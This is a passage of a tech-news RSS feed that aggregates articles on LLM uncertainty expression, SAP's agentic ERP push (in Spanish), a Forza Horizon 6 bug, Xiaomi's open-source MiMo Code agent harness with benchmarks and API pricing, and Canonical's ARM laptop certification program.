"I'm not entirely sure, but I think VentureBeat was founded in..."</p><p>But SFT introduces a "bootstrapping paradox." Unlike standard training datasets where the "right answer" is the same regardless of the model, the ground truth for uncertainty is the model's own dynamic knowledge base.</p><p>“Here's the catch: the 'correct' expression of uncertainty is inherently dynamic, because it depends on what this particular model knows or doesn't know at this particular point in training,” Yona said. “If you train on a label that says 'I don't know X' but the model actually does know X, you've taught it to hallucinate uncertainty... The training data is static, but the target is a moving one, and that's the fundamental tension teams need to grapple with.”</p><h2>The road to self-aware AI</h2><p>For enterprises looking to implement these capabilities without expensive retraining, prompting serves as the most accessible entry point. “Prompt engineering is already something most engineers do today, this provides the lowest-friction path to improving metacognitive behavior today,” Yona said. Enterprise developers can explore frameworks like <a href="https://github.com/yale-nlp/MetaFaith">MetaFaith</a>, an open-source project previously co-authored by Yona, to begin applying metacognitive prompting to off-the-shelf models.</p><p>However, Yona cautions that "there is still substantial headroom that prompting alone doesn’t solve," meaning the industry will eventually need to rely on advanced reinforcement learning (RL) to bake metacognition deeply into model training.</p><p>Ultimately, as enterprises transition from isolated chat applications to complex, multi-agent workflows, self-awareness will become a defining prerequisite for reliable autonomy. But evaluating whether a model truly possesses this awareness remains a profound technical challenge.</p><p>“How do you actually evaluate whether a model can sense its internal states?” Yona asks. “Even in humans, it’s hard to define or separate 'true' self-monitoring abilities from a capable reliance on proxies. We face exactly the same challenges with LLMs: a model might learn to mimic the style of uncertainty without truly sensing its internal state. Developing evaluation frameworks that can tell the difference is one of the most important open problems in this space.”</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[¿Estamos asistiendo a la desaparición de SAP como lo conocíamos?]]></title>
<description><![CDATA[En España, mas de 2.000 empresas que usan SAP como ERP y a nivel global mas de 450.000 empresas, se pueden estar haciendo esta pregunta. El gigante tecnológico alemán celebraba el pasado mes de mayo su gran evento anual, Sapphire 2026 en Madrid, con más de 10.000 asistentes. Para el equipo de dir...]]></description>
<link>https://tsecurity.de/de/3593113/it-nachrichten/estamos-asistiendo-a-la-desaparicin-de-sap-como-lo-conocamos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593113/it-nachrichten/estamos-asistiendo-a-la-desaparicin-de-sap-como-lo-conocamos/</guid>
<pubDate>Fri, 12 Jun 2026 12:17:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>En España, mas de 2.000 empresas que usan SAP como ERP y a nivel global mas de 450.000 empresas, se pueden estar haciendo esta pregunta. El gigante tecnológico alemán celebraba el pasado mes de mayo su gran evento anual, Sapphire 2026 en Madrid, con más de 10.000 asistentes. Para el equipo de dirección de una empresa mediana, este tipo de citas suelen sonar a ruido técnico, “jerga” técnica y promesas difusas. Sin embargo, lo<a href="https://www.computerworld.es/article/4170897/sap-emprende-su-mayor-apuesta-por-la-ia-hasta-la-fecha-con-agentes-que-ejecutan-no-solo-ayudan.html"> vivido este año marca un punto de inflexión estratégico</a> que impacta directamente en la estrategia de crecimiento (CEO) y en la cuenta de resultados (CFO).</p>



<p>Durante la apertura, el consejero delegado de SAP, Christian Klein, lanzó una pregunta provocadora: “¿Seguirá siendo SAP una empresa de software en el futuro?”. La respuesta resume el cambio de paradigma: SAP deja de ser un software que simplemente “registra” lo que hace el equipo humano para convertirse en una plataforma que <strong>ejecuta el trabajo de gestión empresarial de forma autónoma</strong>.</p>



<h2 class="wp-block-heading">El impacto en el negocio: ¿qué ganan el CEO y el CFO?</h2>



<p>Para una empresa mediana, el principal freno para competir con los grandes no suele ser la falta de ideas, sino la falta de brazos y la lentitud en la toma de decisiones. SAP ha presentado su <strong>Autonomous Enterprise</strong>, un ecosistema que despliega más de 50 asistentes y 200 “agentes de IA” especializados integrados en las finanzas, la cadena de suministro y los recursos humanos.</p>



<p>Esto no va de “chatear con un documento”; va de delegar procesos de negocio completos, respaldado por las métricas que la propia compañía y consultoras de mercado ya han puesto sobre la mesa:</p>



<ul class="wp-block-list">
<li><strong>Para el CEO (Escala e Industria):</strong> Con la introducción de SAP <em>Industry AI</em>, la IA viene preconfigurada con el <strong>conocimiento regulatorio y operativo de sectores específicos</strong> recogido durante más de <strong>50 años</strong>. En plantas de producción y operaciones logísticas, la eficiencia se dispara: los datos publicados por la tecnológica reportan <strong>reducciones de hasta un 25% en pérdidas de ingresos por roturas de </strong><em><strong>stock</strong> </em>y mejoras drásticas en la precisión de la planificación de la demanda. Una empresa mediana puede así escalar su producción sin necesidad de multiplicar sus costes fijos.</li>



<li><strong>Para el CFO (Optimización y Caja):</strong> Los nuevos agentes de finanzas pueden gestionar de forma automatizada el proceso de cierre contable mensual. Son capaces de “sentir” las variaciones de ingresos, analizar los riesgos de capital circulante en tiempo real y optimizar la liquidez. Los datos de SAP confirman que la aplicación de estos agentes agiliza la conciliación y los procesos de tesorería, permitiendo a los equipos financieros <strong>reducir hasta un 40% el tiempo dedicado a tareas repetitivas de cierre contable</strong>.</li>
</ul>



<p>Desde el punto de vista del usuario de negocio, también cambia radicalmente con <strong>Joule Work</strong>, que es el gran orquestador de IA generativa. En lugar de navegar por complejos menús repletos de transacciones, el directivo se comunica en lenguaje natural: <em>“Simula el impacto en el margen si el coste del proveedor sube un 8%”</em>. Joule coordina los agentes y ejecuta las acciones. SAP prevé que, para finales de este año, <strong>Joule gestionará de forma directa el 80% de las tareas de negocio más frecuentes dentro del ERP</strong>, transformando la velocidad operativa de la empresa.</p>



<h2 class="wp-block-heading">El nuevo perfil profesional: de la “transacción” a la “gobernanza”</h2>



<p>Este giro hacia la empresa autónoma cambia el perfil del empleado, consultor o técnico tradicional y da luz a una nueva necesidad de talento. Las medianas empresas españolas deben empezar a buscar —y formar— un talento muy diferente para los próximos años. El impacto en los recursos humanos es inminente: estudios globales (McKinsey, Gartner e IDC) de adopción tecnológica estiman que <strong>el 65% de los puestos técnicos actuales en entornos ERP evolucionarán radicalmente hacia roles de supervisión estratégica con conocimiento del sector antes de 2030</strong>.</p>



<h3 class="wp-block-heading">Del picar datos al diseño de procesos</h3>



<p>El perfil del empleado o consultor SAP que pasaba el día introduciendo datos, liberando pedidos manualmente o picando código ABAP a medida está en vías de extinción. Con herramientas como <strong>Joule Studio 2.0</strong> (la nueva “fábrica de agentes” de SAP), el trabajo del profesional consistirá en <strong>diseñar, entrenar y gobernar a los agentes de IA</strong>.</p>



<h3 class="wp-block-heading">El auge del ‘Business Engineer’ y el experto en Gobierno de IA</h3>



<p>Los profesionales del futuro inmediato necesitan ser híbridos, pero partiendo del profesional actual pero reconvertido en:</p>



<ul class="wp-block-list">
<li><strong>Comprensión profunda del negocio:</strong> Deben entender el proceso de principio a fin para instruir correctamente a la IA sobre qué objetivos buscar y qué límites no cruzar.</li>



<li><strong>Gestión del cambio y orquestación:</strong> El valor ya no reside en saber qué botón pulsar, sino en saber auditar los resultados de la IA autónoma. <strong>La precisión del 80% de una IA genérica no sirve en facturación, impuestos, stocks o ventas; a nivel empresa debe ser el 100%.</strong></li>
</ul>



<h2 class="wp-block-heading">El veredicto para la empresa mediana</h2>



<p>La carrera tecnológica ya no la gana quien tiene el equipo de IT más grande, sino quien adopta antes un modelo operativo autónomo. Para el tejido empresarial mediano, la IA agentica democratiza la eficiencia que antes solo estaba al alcance de las multinacionales con presupuestos infinitos. La tecnología ya está disponible; el verdadero reto para los comités de dirección españoles a partir de este año será cultural y de gestión del talento.</p>



<div class="wp-block-media-text is-stacked-on-mobile"><figure class="wp-block-media-text__media"><img decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/HOP_Imagen-Felix-Nota-de-presna.png?w=1024" alt="Félix Monedero" class="wp-image-4184469 size-full" loading="lazy" width="400px"></figure><div class="wp-block-media-text__content">
<p><strong><em><strong>El autor de este artículo es <a href="https://www.linkedin.com/in/felixmonederotorres/" target="_blank" rel="nofollow">Félix Monedero</a>, CEO de Hoppers Academy y <a href="https://www.computerworld.es/article/2127282/incluso-microsoft-e-ibm-usan-nuestro-erp.html">exdirector general de SAP en España</a></strong></em>. </strong></p>
</div></div>



<p></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Forza Horizon 6's save-wiping bug is finally being investigated: "Thank you for your patience while we work on a resolution"]]></title>
<description><![CDATA[Playground Games has finally provided an update on Forza Horizon 6's save-wiping bug. While a PC fix is already rolling out through Microsoft Gaming Services, Xbox players will require a system update, with Quick Resume currently identified as a potential contributor to the issue.]]></description>
<link>https://tsecurity.de/de/3593051/windows-tipps/forza-horizon-6s-save-wiping-bug-is-finally-being-investigated-thank-you-for-your-patience-while-we-work-on-a-resolution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593051/windows-tipps/forza-horizon-6s-save-wiping-bug-is-finally-being-investigated-thank-you-for-your-patience-while-we-work-on-a-resolution/</guid>
<pubDate>Fri, 12 Jun 2026 11:53:38 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Playground Games has finally provided an update on Forza Horizon 6's save-wiping bug. While a PC fix is already rolling out through Microsoft Gaming Services, Xbox players will require a system update, with Quick Resume currently identified as a potential contributor to the issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[Xiaomi's new open source, agentic AI coding harness MiMo Code beats Claude Code at ultra-long, 200+ step tasks]]></title>
<description><![CDATA[Xiaomi's MiMo AI team has open-sourced MiMo Code V0.1.0, a terminal-native AI coding assistant that the Chinese electronics giant says outperforms Anthropic's Claude Code on key agentic coding benchmarks, especially on long-horizon, multi-step tasks (200+ steps) — at least, according to its own i...]]></description>
<link>https://tsecurity.de/de/3592084/it-nachrichten/xiaomis-new-open-source-agentic-ai-coding-harness-mimo-code-beats-claude-code-at-ultra-long-200-step-tasks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592084/it-nachrichten/xiaomis-new-open-source-agentic-ai-coding-harness-mimo-code-beats-claude-code-at-ultra-long-200-step-tasks/</guid>
<pubDate>Fri, 12 Jun 2026 02:02:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Xiaomi's MiMo AI team has <a href="https://mimo.xiaomi.com/blog/mimo-code-long-horizon">open-sourced MiMo Code V0.1.0</a>, a terminal-native AI coding assistant that the Chinese electronics giant says outperforms Anthropic's Claude Code on key agentic coding benchmarks, especially on long-horizon, multi-step tasks (200+ steps) — at least, according to its own internal beta release and survey of 576 developers. </p><p>It's also bundling limited-time free access to MiMo-V2.5, its multimodal flagship model with a million-token context window, requiring no registration to get started.</p><p>The release was announced June 10, 2026 in a post on the social network X from the official <a href="https://x.com/XiaomiMiMo/status/2064799879352959085">@XiaomiMiMo account</a>, which described the tool as "more than an AI coding assistant in your terminal — it's the smartest coding partner you'll ever work with."</p><p>MiMo Code is available now on <a href="https://github.com/XiaomiMiMo/MiMo-Code">GitHub</a> under an <a href="https://github.com/XiaomiMiMo/MiMo-Code/blob/main/LICENSE">MIT license</a>, and installs with a single terminal command (<code>curl -fsSL https://mimo.xiaomi.com/install | bash</code>) on macOS and Linux or via npm (<code>npm install -g @mimo-ai/cli</code>) on Windows. </p><p>The project is a fork of the open-source OpenCode agent, which Xiaomi has extended with its own memory architecture, workflow modes, and model harness.</p><h2><b>The end of AI coding agents' amnesia?</b></h2><p>As any avid vibe coder would surely attest, AI coding agents degrade over long working sessions: as the context window fills, earlier decisions, conventions, and task state get compacted away or lost entirely, forcing developers to re-explain their projects.</p><p>Xiaomi argues this approach is doomed at scale. "What we need is not better compression, but an explicit storage-and-retrieval mechanism that decides what information should be written into persistent structures, and when it should be recalled," the MiMo team noted in their<a href="https://mimo.xiaomi.com/blog/mimo-code-long-horizon"> launch blog</a>.</p><p>MiMo Code attacks this with a cross-session memory system, powered under the hood by SQLite FTS5 full-text search, that spans four layers: project memory (a persistent <code>MEMORY.md</code> file), session checkpoints, scratch notes, and per-task progress logs. </p><p>The note-taking is key, here: Rather than forcing the primary coding agent to pause its work to take notes, the system deploys an independent "checkpoint-writer" subagent. </p><p>Think of it the primary coding agent as a construction contractor working to build a massive mansion alongside a dedicated architect, the checkpoint-writer subagent. While the main agent focuses on building out the physical structure, the subagent updates the blueprints in real time, noting decisions, issues, and the actual lay of the land as the construction project progresses. </p><p>When the context window approaches its limits — the contractor gets lost in the half-built mansion — it can consult the subagent and find its place again. In the case of MiMo Code, the system simply rebuilds the environment from  structured checkpoints with the relevant context, ensuring no loss of operational momentum.</p><p>Two self-improvement mechanisms round out the system: a <code>/dream</code> command that periodically (roughly every seven days) reviews historical sessions, deduplicates them, and compresses them into long-term memory, and a "distill" function that mines past sessions for repeated workflows that can be automated, following a similar approach taken recently by <a href="https://openai.com/index/chatgpt-memory-dreaming/">OpenAI</a> and <a href="https://venturebeat.com/technology/anthropic-introduces-dreaming-a-system-that-lets-ai-agents-learn-from-their-own-mistakes">Anthropic</a> with their various models. </p><h2><b>Impressive performance on software engineering (SWE) benchmarks</b></h2><p>According to benchmark figures published in Xiaomi's technical blog post, MiMo Code paired with MiMo-V2.5-Pro outperformed Claude Code paired with Claude Sonnet 4.6 on all three evaluations tested:</p><ul><li><p>SWE-bench Verified:<b> 82%</b> vs. 79%</p></li><li><p>SWE-bench Pro: <b>62% </b>vs. 55%</p></li><li><p>Terminal Bench 2:<b> 73%</b> vs. 69%</p></li></ul><p>The harness itself accounts for a measurable share of the gain. Running the same MiMo-V2.5-Pro model in both harnesses, MiMo Code scored 62% on SWE-bench Pro versus 57% for Claude Code, and 73% on Terminal Bench 2 versus 68% — roughly five points each, attributable purely to the agent system rather than the model.</p><p>Xiaomi notably did not publish comparisons against OpenAI's Codex or Google's Gemini CLI — Claude Code is the sole named competitor throughout its materials, a telling choice of benchmark target.</p><p>Independent reference points suggest why. On the <a href="https://www.tbench.ai/leaderboard/terminal-bench/2.0">official Terminal-Bench 2.0 leaderboard </a>maintained at tbench.ai, OpenAI's Codex CLI running GPT-5.5 scores 82.2% — roughly nine points above MiMo Code's self-reported 73% — and OpenAI's own GPT-5.5 announcement claims 82.7% on the same benchmark. </p><p>On SWE-Bench Pro, however, the picture flips: OpenAI reports GPT-5.5 at 58.6%, below MiMo Code + MiMo-V2.5-Pro's claimed 62%. (MiMo Code does not yet appear on either official leaderboard, and cross-comparing self-run numbers against leaderboard submissions carries the usual configuration caveats.)</p><p>Perhaps more interesting than the offline benchmarks: Xiaomi says it ran a human double-blind A/B evaluation during its internal beta, covering 576 developers working in 474 real private repositories, producing 1,213 judged head-to-head pairs against Claude Code using the same target model. </p><p>Under 200 execution steps, the two systems split roughly 50/50 — but <b>past 200 steps, MiMo Code's win rate rose above 65%,</b> supporting the company's thesis that its memory and state-management architecture pays off specifically on long-horizon work. </p><p>Xiaomi itself concedes the standard benchmarks "still measure one-shot problem-solving ability" and don't capture the tool's multi-session design goals.</p><p>As always, these are vendor self-reported numbers that haven't been independently verified, and head-to-head harness comparisons are sensitive to configuration. But the claims are consistent with a broader industry pattern: scaffolding and harness engineering are becoming as important as raw model capability in agentic coding performance.</p><h2><b>Easy integration with existing developer systems and voice control</b></h2><p>From a user experience standpoint, MiMo Code is designed to live where developers already work. It operates directly in the terminal, reading and writing files, running commands, and managing Git.</p><p>Out of the box, the tool requires zero configuration, connecting automatically to "MiMo Auto"—a free-for-a-limited-time channel powered by Xiaomi’s multimodal MiMo V2.5 model, which boasts a massive million-token context window. For developers migrating from existing environments, the transition is frictionless: MiMo Code automatically imports MCP servers, custom skills, and API configurations from Claude Code.</p><p>Other noteworthy features include:</p><ul><li><p><b>Compose mode:</b> Pressing Tab switches the agent into a specification-driven workflow in which the developer describes a high-level goal and the system autonomously executes the full development cycle — design, planning, coding, testing, and review — following what Xiaomi describes as a "heavy planning upfront, stable verification later" strategy.</p></li><li><p><b>Voice control: </b>Built on Xiaomi's MiMo-ASR speech recognition with TenVAD voice activity detection, developers can dictate and modify instructions verbally and speak commands like "send" and "execute" for fully hands-free operation (available for logged-in users).</p></li></ul><p>According to Xiaomi, the gains from the agent harness itself are measurable. Running the same underlying MiMo model in both harnesses, the company says MiMo Code scored 62% on SWE-Bench Pro versus 57% for Claude Code, and 73% on Terminal Bench 2 versus Claude Code's 68% — roughly five percentage points better on each, attributable purely to the agent system rather than the model.</p><p>As always, these are vendor self-reported numbers that haven't been independently verified, and head-to-head harness comparisons are sensitive to configuration. But the claim is consistent with a broader industry pattern: scaffolding and harness engineering are becoming as important as raw model capability in agentic coding performance.</p><h2><b>Aggressively affordable</b></h2><p>The bigger lure for many developers may be what's bundled in. </p><p>MiMo Code ships with "MiMo Auto," a zero-configuration channel offering free, limited-time access to MiMo-V2.5 — the natively multimodal model Xiaomi released in late April 2026, a sparse mixture-of-experts design with 310 billion total parameters (just 15 billion active per inference) and a 1 million token context window, which the company positions as matching Anthropic's Claude Sonnet 4.6 in multimodal agentic work.</p><p>As <a href="https://venturebeat.com/technology/open-source-xiaomi-mimo-v2-5-and-v2-5-pro-are-among-the-most-efficient-and-affordable-at-agentic-claw-tasks">VentureBeat reported when the MiMo-V2.5 family launched in April,</a> the models are MIT-licensed and among the most efficient and affordable available for agentic tasks.</p><p>The larger MiMo-V2.5-Pro — a 1.02-trillion-parameter mixture-of-experts model with 42 billion active parameters and a hybrid-attention architecture — led the open-source field on Xiaomi's ClawEval agentic benchmark with a 63.8% success rate while consuming only about 70,000 tokens per trajectory, roughly 40–60% fewer than Anthropic's Claude Opus 4.6, Google's Gemini 3.1 Pro, or OpenAI's GPT-5.4 needed for comparable results. </p><p>Notably, the V2.5-Pro's post-training was explicitly designed to instill "harness awareness" — training the model to manage its own memory and context within agent scaffolds like Claude Code or OpenCode — making a Xiaomi-built harness optimized around that capability a logical next step.</p><p>Pricing is similarly aggressive: MiMo-V2.5 starts at $0.40 per million input tokens and $2.00 per million output tokens, while V2.5-Pro runs $1.00/$3.00 per million (input/output) up to 256K context, doubling beyond that, with cache hits dropping input costs to as little as $0.20–$0.40 per million, making it among the cheapest frontier models available globally. </p><h1><b>VentureBeat Frontier AI Model API Pricing Snapshot</b></h1><table><tbody><tr><td><p><b>Model</b></p></td><td><p><b>Input</b></p></td><td><p><b>Output</b></p></td><td><p><b>Total Cost</b></p></td><td><p><b>Source</b></p></td></tr><tr><td><p>MiMo-V2.5 Flash</p></td><td><p>$0.10</p></td><td><p>$0.30</p></td><td><p>$0.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi MiMo</a></p></td></tr><tr><td><p>deepseek-v4-flash</p></td><td><p>$0.14</p></td><td><p>$0.28</p></td><td><p>$0.42</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>deepseek-v4-pro</p></td><td><p>$0.435</p></td><td><p>$0.87</p></td><td><p>$1.305</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>MiniMax-M3</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://platform.minimax.io/subscribe/token-plan?tab=api-enterprise">MiniMax</a></p></td></tr><tr><td><p>Gemini 3.1 Flash-Lite</p></td><td><p>$0.25</p></td><td><p>$1.50</p></td><td><p>$1.75</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Qwen3.7-Plus</p></td><td><p>$0.40</p></td><td><p>$1.60</p></td><td><p>$2.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-plus&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>MiMo-V2.5</p></td><td><p>$0.40</p></td><td><p>$2.00</p></td><td><p>$2.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi MiMo</a></p></td></tr><tr><td><p>Grok 4.3 (low context)</p></td><td><p>$1.25</p></td><td><p>$2.50</p></td><td><p>$3.75</p></td><td><p><a href="https://docs.x.ai/developers/models/grok-4.3">xAI</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (≤256K)</p></td><td><p>$1.00</p></td><td><p>$3.00</p></td><td><p>$4.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi MiMo</a></p></td></tr><tr><td><p>GLM-5</p></td><td><p>$1.00</p></td><td><p>$3.20</p></td><td><p>$4.20</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>Kimi-K2.6</p></td><td><p>$0.95</p></td><td><p>$4.00</p></td><td><p>$4.95</p></td><td><p><a href="https://platform.kimi.ai/docs/pricing/chat-k26">Moonshot/Kimi</a></p></td></tr><tr><td><p>GLM-5.1</p></td><td><p>$1.40</p></td><td><p>$4.40</p></td><td><p>$5.80</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>Grok 4.3 (high context)</p></td><td><p>$2.50</p></td><td><p>$5.00</p></td><td><p>$7.50</p></td><td><p><a href="https://docs.x.ai/developers/models/grok-4.3">xAI</a></p></td></tr><tr><td><p><b>MiMo-V2.5 Pro (&gt;256K)</b></p></td><td><p><b>$2.00</b></p></td><td><p><b>$6.00</b></p></td><td><p><b>$8.00</b></p></td><td><p><b></b><a href="https://platform.xiaomimimo.com/docs/en-US/pricing"><b>Xiaomi MiMo</b></a></p></td></tr><tr><td><p>Qwen3.7-Max</p></td><td><p>$2.50</p></td><td><p>$7.50</p></td><td><p>$10.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?spm=a2ty_o05.31384571.0.0.52649f6b7G0D55&amp;tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-max&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>Gemini 3.5 Flash</p></td><td><p>$1.50</p></td><td><p>$9.00</p></td><td><p>$10.50</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (≤200K)</p></td><td><p>$2.00</p></td><td><p>$12.00</p></td><td><p>$14.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>GPT-5.4</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (&gt;200K)</p></td><td><p>$4.00</p></td><td><p>$18.00</p></td><td><p>$22.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Claude Opus 4.8</p></td><td><p>$5.00</p></td><td><p>$25.00</p></td><td><p>$30.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/pricing">Anthropic</a></p></td></tr><tr><td><p>GPT-5.5</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>Claude Fable 5 / Claude Mythos 5</p></td><td><p>$10.00</p></td><td><p>$50.00</p></td><td><p>$60.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/models/overview">Anthropic</a></p></td></tr></tbody></table><p>For developers who don't want Xiaomi's models at all, MiMo Code also supports third-party backends — including token plans from DeepSeek, Moonshot's Kimi, and Zhipu's GLM — along with any OpenAI-compatible API, mirroring the bring-your-own-model flexibility of its OpenCode parent.</p><h2><b>Terminal AI coding agent wars go global</b></h2><p>MiMo Code lands in an increasingly crowded field of terminal-based coding agents: Anthropic's Claude Code, OpenAI's Codex CLI, Google's Gemini CLI, and open-source players like OpenCode and Aider. </p><p>What's new is the entrant. Xiaomi — the world's third-largest smartphone maker, with a fast-growing EV business — has been methodically building its MiMo AI division since the release of the MiMo-7B reasoning model in April 2025, following with the MiMo-VL vision-language series, MiMo-V2-Flash, the 1-trillion-parameter MiMo-V2-Pro in March 2026, and the V2.5 flagship family in April. </p><p>The effort is led by Fuli Luo, a veteran of DeepSeek's disruptive R1 project, who has characterized Xiaomi's frontier push as a "quiet ambush" — and backed it with a 100-trillion free token grant for builders announced alongside the V2.5 launch.</p><p>The playbook is familiar from <a href="https://venturebeat.com/infrastructure/how-deepseeks-radical-architecture-is-shattering-silicon-valleys-token-moat">DeepSeek</a>, <a href="https://venturebeat.com/technology/alibabas-qwen3-7-plus-supports-text-video-and-imagery-inputs-at-low-cost-of-0-4-1-6-per-1m-token-but-its-proprietary">Alibaba's Qwen</a>, <a href="https://venturebeat.com/technology/minimax-m3-debuts-eclipsing-gpt-5-5-and-gemini-3-1-pro-on-key-benchmark-performance-for-just-5-10-of-the-cost">MiniMax</a>, and <a href="https://venturebeat.com/ai/kimi-k2-6-runs-agents-for-days-and-exposes-the-limits-of-enterprise-orchestration">Moonshot AI's Kimi series</a>: release genuinely capable models and tooling under permissive licenses at a fraction of U.S. lab pricing, and convert the resulting developer mindshare into a durable ecosystem. </p><p>By pairing an open-source agent harness with a free frontier-class model, Xiaomi is effectively eliminating both the licensing and the usage cost of entry — at least for now.</p><h2><b>What it means for enterprises and technical decision-makers</b></h2><p>For engineering leaders, MiMo Code is a low-risk, potentially high-value evaluation candidate: MIT-style licensing permits modification and commercial integration, the OpenCode lineage means the architecture is inspectable, and the bring-your-own-model support means it can be pointed at an internally approved endpoint rather than Xiaomi's cloud. </p><p>The persistent memory system addresses a real and widely felt pain point in agentic development workflows — one that competitors are also racing to solve.</p><p>The countervailing considerations: the "free for a limited time" model access is by definition temporary and routes code context through Xiaomi's servers, which will be a non-starter for organizations with strict data-residency or IP policies; the benchmark edge over Claude Code is self-reported; and a V0.1.0 release number signals exactly what it suggests about maturity. </p><p>Teams subject to U.S. government procurement restrictions on Chinese technology vendors should also weigh that context before adopting.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Canonical Launches ARM Laptop Certification Program to Boost Ubuntu’s Next Generation of Mobile Computing]]></title>
<description><![CDATA[by George Whittaker
      
            Canonical is expanding its hardware certification efforts with a new focus on ARM-powered laptops, a move that reflects the growing momentum behind ARM architecture in the personal computing market. As ARM processors become increasingly common in laptops tha...]]></description>
<link>https://tsecurity.de/de/3592080/unix-server/canonical-launches-arm-laptop-certification-program-to-boost-ubuntus-next-generation-of-mobile-computing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592080/unix-server/canonical-launches-arm-laptop-certification-program-to-boost-ubuntus-next-generation-of-mobile-computing/</guid>
<pubDate>Fri, 12 Jun 2026 02:01:03 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-history-node-id="1341435" class="layout layout--onecol">
    <div class="layout__region layout__region--content">
      
            <div class="field field--name-field-node-image field--type-image field--label-hidden field--item">  <img loading="lazy" src="https://www.linuxjournal.com/sites/default/files/nodeimage/story/canonical-launches-arm-laptop-certification-program-to-boost-ubuntus-next-generation-of-mobile-computing.jpg" width="850" height="500" alt="Canonical Launches ARM Laptop Certification Program to Boost Ubuntu’s Next Generation of Mobile Computing" typeof="foaf:Image" class="img-responsive"></div>
      
            <div class="field field--name-node-author field--type-ds field--label-hidden field--item">by <a title="View user profile." href="https://www.linuxjournal.com/users/george-whittaker" lang="" about="https://www.linuxjournal.com/users/george-whittaker" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">George Whittaker</a></div>
      
            <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p>Canonical is expanding its hardware certification efforts with a new focus on <strong>ARM-powered laptops</strong>, a move that reflects the growing momentum behind ARM architecture in the personal computing market. As ARM processors become increasingly common in laptops thanks to their impressive balance of performance, battery life, and efficiency, Canonical aims to ensure that Ubuntu users receive a seamless experience on this emerging class of hardware.</p>

<p>The initiative represents another step in Ubuntu’s long-standing effort to provide reliable Linux support across a wide range of devices while strengthening relationships with hardware manufacturers.</p>

<h2><strong>Why ARM Laptops Matter More Than Ever</strong></h2>

<p>For years, x86 processors from Intel and AMD dominated the laptop market. However, the landscape has changed significantly as ARM-based systems have become more powerful and capable.</p>

<p>Modern ARM laptops offer several advantages:</p>

<ul><li>Longer battery life</li>
	<li>Lower power consumption</li>
	<li>Reduced heat output</li>
	<li>Always-on connectivity capabilities</li>
	<li>Competitive performance for everyday workloads</li>
</ul><p>As manufacturers increasingly invest in ARM hardware, Linux distributions face growing pressure to ensure compatibility matches what users expect from traditional x86 systems. Canonical has already spent years supporting ARM across cloud, server, IoT, and embedded environments, making laptops a natural next step.</p>

<h2><strong>What the Certification Program Does</strong></h2>

<p>The new certification effort builds upon Canonical’s existing Ubuntu Certified Hardware program, which validates systems through extensive testing covering both hardware and operating system functionality. Certified devices undergo comprehensive verification to ensure Ubuntu operates correctly across critical components and daily workflows.</p>

<p>Testing typically includes:</p>

<ul><li>Wireless networking</li>
	<li>Audio functionality</li>
	<li>Graphics performance</li>
	<li>Bluetooth support</li>
	<li>USB device compatibility</li>
	<li>Power management</li>
	<li>Suspend and resume behavior</li>
	<li>Firmware integration</li>
	<li>Security features such as TPM support</li>
</ul><p>The goal is to eliminate the uncertainty that Linux users sometimes face when purchasing new hardware.</p>

<h2><strong>Creating a Better Ubuntu Experience on ARM</strong></h2>

